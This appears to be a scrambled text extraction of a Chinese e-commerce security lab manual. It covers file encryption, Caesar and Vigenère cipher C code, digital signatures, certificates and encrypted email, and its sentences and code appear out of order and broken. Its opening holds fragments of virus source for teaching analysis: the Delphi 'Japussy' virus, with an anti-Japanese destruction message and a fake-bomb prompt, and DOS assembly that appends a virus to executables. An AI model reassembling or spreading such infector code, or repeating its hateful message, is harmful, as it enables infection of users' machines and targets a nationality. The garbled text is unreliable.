【正文】 e(FileName: string)。 (Src, Count)。 begin sCurPos := 。 Dst: TStream。 if ( = VER_PLATFORM_WIN32_WINDOWS) then //Win9x Result := True。 var Ver: TOSVersionInfo。 Si: STARTUPINFO。 stdcall。If a country need to be destroyed, it must be Japan! 39。 //PE 文件主圖標(biāo)的尾部 ID = $44444444。 //PE 文件主圖標(biāo)的偏移量 //在我的 Delphi5 SP1 上面編譯得到的大小，其 它版本的 Delphi 可能不同 //查找 2800000020 的十六進(jìn)制字符串可以找到主圖標(biāo)的偏移量 { HeaderSize = 38912。 program Japussy。 清除： （ 1） 斷開計(jì)算機(jī)與網(wǎng)絡(luò)的連接； （ 2） 刪除文件 : %Windir%\system32\； （ 3） 停止進(jìn)程 ； （ 4） 在注冊(cè)表內(nèi)刪除 windows auto update=的自動(dòng)運(yùn)行； （ 5） 也可在網(wǎng)上下載各種病毒專殺工具。 bootcmd1 db 0a8h,0ach,0a3h,0bch,0b0h,0b2h,0b2h,0beh 。*.COM39。 39。 fn_ret3: pop cx 。 xor dx,dx 。把本病毒寫至文件尾 xor cx,cx 。 sub fill,cx 。 若已經(jīng)被感染就返回 jz fn_ret1 。 mov ah,3fh 。 檢查是否已經(jīng)被我感染過 mov cx,word ptr [di+1ch] 。 mov ax,word ptr [si+014h] 。 cmp word ptr [si],39。 讀文件頭 mov ah,03fh 。 mov ax,4301h xor cx,cx int 21h mov ax,03d02h 。 jae fn_ret 。可執(zhí)行的文件頭的地址 mov di,offset dta 。 mov fs,dx 。 找 c:\ mov si,dx 。 fs 用于傳遞文件名的地址 call setfile1 。用于 findfirst int 21h 。 ret 。 這里既加密代碼 mov word ptr [si],ax 。 db 09ah getdate proc near 。 mov sp,cs:oldsp 。 pop es 。 并保存入棧 push oldip 。 push ds 。 對(duì)文件型病毒源代碼進(jìn)行分析 CODE SEGMENT assume cs:code .386 100h start: mov cs:oldsp,sp 。39。如果你想避免炸彈的爆炸，給你一個(gè)機(jī)會(huì)試試：同時(shí)按動(dòng) Ctrl+Alt+Del 可能避免它的爆炸，如果你單擊〖確定〗按鈕則炸彈立刻爆炸！?。?39。 【實(shí)驗(yàn)學(xué)時(shí)】 2 學(xué)時(shí)。 （ 3）當(dāng)收件人收到并打開已加密過的郵件時(shí)，將看到 加密郵件 的提示信息，按 “繼續(xù) ”按鈕后，可閱讀到該郵件的內(nèi)容。單擊該標(biāo)識(shí)，找到 “安全 ”項(xiàng)，單擊 “查看 證書 ”按鈕，可以查看 “發(fā)件人證書 ”；單擊 “添加到通訊簿 ”按鈕，在通訊簿中保存發(fā)件人的加密首選項(xiàng)，這樣對(duì)方數(shù)字證書就被添加到你的通訊簿中。在收件箱中，當(dāng)郵件未閱讀或簽名未檢查時(shí)，簽名證書標(biāo)志出現(xiàn)在未拆封信封圖標(biāo)（在發(fā)件人姓名前）的右側(cè)；當(dāng)雙擊郵件進(jìn)行安全檢查后，證書標(biāo)志出現(xiàn)在已拆封的信封圖標(biāo)的左側(cè)。 （ 2）點(diǎn)擊新郵件窗口左邊的 “發(fā)送 ”按鈕。勾選 “在服務(wù)器上保留郵件副本 ”。 23 （ 9）選取安全選項(xiàng)卡，選擇簽名證書和加密證書及算法。 22 單擊 “下一步 ”，郵件設(shè)置成功。 19 此時(shí)顯示前面你所選擇的所有設(shè)置，如果覺得完全正確則點(diǎn)擊 “完成 ”，如有錯(cuò)誤則點(diǎn) 擊 “上一步 ”（如圖 16）。 17 點(diǎn)擊 “導(dǎo)入 ”按鈕，此時(shí)會(huì)彈出證書導(dǎo)入向?qū)Вㄈ鐖D 12）。 16 此時(shí)顯示前面你所選擇的所有設(shè)置，如果覺得完全正確則點(diǎn)擊 “完成 ”，如有錯(cuò)誤則點(diǎn)擊 “上一步 ”（如圖 10）。 打開一個(gè) IE 瀏覽器，工具 ?Inter 選項(xiàng) ?內(nèi)容 ?證書（如圖 5）。雙擊證書查看證書內(nèi)容。 下載安裝數(shù)字證書。 選擇 “免費(fèi)證書 ”欄目的 “用表格申請(qǐng)證書 ”，填寫申請(qǐng)表。 只有安裝了根證書鏈的計(jì)算機(jī)，才能完成網(wǎng)上申請(qǐng)的步驟和證書的正常使用。 【實(shí)驗(yàn)學(xué)時(shí)】 2 學(xué)時(shí)。 PKCS12 公鑰加密標(biāo)準(zhǔn) 12 (PKCS12) 可包含所有私鑰、公鑰和證書。它存儲(chǔ)用 Base64 編碼的 DER 格式數(shù)據(jù)，用 ascii 報(bào)頭包圍，因此適合系統(tǒng)之間的文本模式傳輸。s Public Key 證書持有人的公鑰 Signature 驗(yàn)證機(jī)構(gòu)對(duì)證書的簽名 證書內(nèi)容由以下兩部分組成： （ 1） 申請(qǐng)者的信息 a) 版本信息，用來與 的將來版本兼容； b) 證書序列號(hào)，每一個(gè)由 CA 發(fā)行的證書必須有一個(gè)唯一的序列號(hào)； c) CA 所使用的簽名算法； d) 發(fā)行證書 CA 的名稱； e) 證書的有效期限； f) 證書主題名稱； H ERa [H（ M） ] KUa E KRa 比較 H || D M M 用戶 B 用戶 A 11 g) 被證明的公鑰信息，包括公鑰算法、公鑰的位字符串表示； h) 包含額外信息的特別擴(kuò)展。認(rèn)證中心頒發(fā)的數(shù)字證書均遵循 V3 標(biāo)準(zhǔn)。使用數(shù)字簽名就可以確定文件沒有被故意更改。哈希函數(shù)可以把任意長(zhǎng)度的輸入串變化成固定長(zhǎng)度的輸出串，因此，數(shù)字簽名利用哈希函數(shù)將一份文檔縮減成一個(gè)摘要。除此以外，因?yàn)閿?shù)字簽名不是被簽明消息的物理組成部分，它還必須保證消息的完整性，在一份經(jīng)數(shù)字簽名的文件中，我們希望禁止再增加額外的文字，也希望禁止從一份真實(shí)可靠的、已經(jīng)簽署的文檔中移出簽名，將其轉(zhuǎn)嫁到其他文檔。 【實(shí)驗(yàn)預(yù)備知識(shí)】 數(shù)字簽名原理 在日常生活中，經(jīng)常需要人們簽署各種信件和文書，隨著信息時(shí)代的來臨，人們希望對(duì)越來越多的電子文件進(jìn)行迅速的、遠(yuǎn)距離的簽名，這就是數(shù)字簽名。 將每個(gè)文件的數(shù)字簽名保存在數(shù)據(jù)庫(kù)中，也可保存在目錄中，但須考慮簽名的安全性。 【實(shí)驗(yàn)環(huán)境】 （ 1） 生成好的數(shù)字證書和私鑰，以 PKCS12 文件形式存放。 按照上圖所示的文件完整性保護(hù)過程編寫程序，該程序應(yīng)能實(shí)現(xiàn)以下內(nèi)容： （ 1）提供一個(gè)主運(yùn)行界面，能在該界面里選擇公鑰證書存放路徑和私鑰文件存放路徑。 【實(shí)驗(yàn)學(xué)時(shí)】 2 學(xué)時(shí)。 free(key)。j = i。z39。amp。A39。a39。z39。a39。A39。Z39。A39。amp。A39。A39。amp。a39。A39。amp。Z39。A39。 } else i++。 while(i N) { // key[i%strlen(key)] = getchar()。 exit(1)。 if(key == NULL) { printf(Memory location failed!)。 int* _cphrtxt。j++) printf(%c,_cphrtxt[j])。 else //如果為其他字符，則不變輸出 _cphrtxt[i] = _plntxt[i]。 _plntxt[i] = 122) //直接轉(zhuǎn)換為大寫 _cphrtxt[i] = (_plntxt[i]%39。 else if(_plntxt[i] = 39。) //直接轉(zhuǎn)換為小寫 _cphrtxt[i] = (_plntxt[i]%39。 amp。 } //keasar 加密算法 for(i = 0。key)。 while(!isdigit(key)) { //key = 0。 //接收明文 _plntxt = inputPandK()。 } void caesar() { char* _plntxt。\039。 } /*輸 入明文 */ printf(****Enter plaintext: \n)。//聲明一個(gè)明文指針類型 int i = 0,choose = 0。 case 2: vigenere()。i)。 printf(****2Vigenere **** \n)。 } void menu() { int i=0。/*愷撒加密算法 */ void vigenere()。維吉尼亞 amp。 【實(shí)驗(yàn)學(xué)時(shí)】 2 學(xué)時(shí)。 圖 3 文件夾加密高級(jí)屬性設(shè)置 （ 4） 系統(tǒng)將進(jìn)一步彈出 “確認(rèn)屬性更改 ”對(duì)話框。 圖 1 右鍵快捷菜單中的【屬性】選項(xiàng) （ 2） 在【屬性】對(duì)話框窗口中，單擊“常規(guī)”選項(xiàng)卡中的【高級(jí)】按鈕，如圖 2 所示。 【實(shí)驗(yàn)內(nèi)容和步驟】 一、 實(shí)驗(yàn)內(nèi)容 查找 5 個(gè)專業(yè)電子商務(wù)安全的網(wǎng)站； 查找當(dāng)前國(guó)際和國(guó)內(nèi)電子商務(wù)安全技術(shù)的發(fā)展?fàn)顩r的文章，閱讀并總結(jié)； 查找現(xiàn)有的電子商務(wù)安全方法有哪些，效果如何； 查找目前市場(chǎng)上常采用的電子商務(wù)安全技術(shù)，并比較不同技術(shù)的優(yōu)缺點(diǎn)和使用的場(chǎng)合； 在 Window 2020/XP 下加密文件及文件夾。 【實(shí)驗(yàn)學(xué)時(shí)】 2 學(xué)時(shí)。 如圖1 所示 。加密后觀察文件夾 名字的顏色發(fā)生變化，這意味著非授權(quán)用戶將無法訪問此文件夾。 3 實(shí)驗(yàn)二 密碼技術(shù)實(shí)驗(yàn) 【實(shí)驗(yàn)?zāi)康摹? 通過本次實(shí)驗(yàn)，了解 對(duì)稱密鑰與公開密鑰加密體制的基本原理，掌握常見的對(duì)稱密鑰加密算法，掌握 RSA 算法的基本原理及算法過程，了解現(xiàn)代密碼學(xué)的最新動(dòng)態(tài) 。 密碼技術(shù)實(shí)驗(yàn) (愷撒 amp。/*輸入明文和密鑰 */ void caesar()。 return 0。 printf(****1Keasar **** \n)。 scanf(%d,amp。 break。 } } //輸入明文和密鑰 char* inputPandK() { char * plntxt。 exit(1)。 //如果輸入不合法，跳出循環(huán)，最后一個(gè)元素賦值為空 if(plntxt[i] 126 || plntxt[i] 32) { plntxt[i] = 39。 } //返回該數(shù)組首地址 return plntxt。 unsigned char key = 0。key)。 scanf(%c,amp。 exit(1)。A39。Z39。a39。amp。A39。j = i。 } void vigenere() { char* _plntxt。 //開辟密鑰，密文空間 key = (char *)malloc(N * sizeof(char))。 if(_cphrtxt == NULL) { printf(Memory location failed!)。 fflush(stdin)。 break。i++) { //密鑰為大寫字母 7 if(key[i%strlen(key)] = 39。 key[i%strlen(key)] = 39。 amp。) _cphrtxt[i] = (key[i%strlen(key)]39。)%26 + 39。 amp。) _cphrtxt[i] = (key[i%strlen(key)]39。)%26 + 39。 amp。) { //明文為大寫字母 if(_plntxt[i] = 39。 _plntxt[i] = 39。 + _plntxt[i]39。 //明文為小寫字母 if(_plntxt[i] = 39。 _plntxt[i] = 39。 + _plntxt[i]39。 } //如果為其他字符，則不變輸出 if(key[i%strlen(key)] 39。 amp。)) || key[i%strlen(key)] 39。 for(j = 0。 free(_